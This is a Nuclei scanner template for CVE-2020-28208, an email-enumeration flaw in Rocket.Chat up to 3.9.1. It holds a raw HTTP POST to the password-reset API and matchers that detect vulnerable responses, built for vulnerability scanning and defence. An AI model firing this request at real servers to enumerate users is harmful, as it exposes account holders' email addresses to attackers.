48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: CVE-2020-28208
|
|
|
|
info:
|
|
name: Rocket.Chat <3.9.1 - Information Disclosure
|
|
author: pdteam
|
|
severity: medium
|
|
description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://trovent.io/security-advisory-2010-01
|
|
- https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt
|
|
- http://www.openwall.com/lists/oss-security/2021/01/07/1
|
|
- http://packetstormsecurity.com/files/160845/Rocket.Chat-3.7.1-Email-Address-Enumeration.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-28208
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-28208
|
|
cwe-id: CWE-203
|
|
cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00732
|
|
metadata:
|
|
max-request: 1
|
|
tags: packetstorm,cve,cve2020,rocketchat
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
Content-Type: application/json
|
|
|
|
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '"result\":false'
|
|
- '"success":true'
|
|
part: body
|
|
condition: and
|
|
|
|
# Enhanced by md on 2023/04/04
|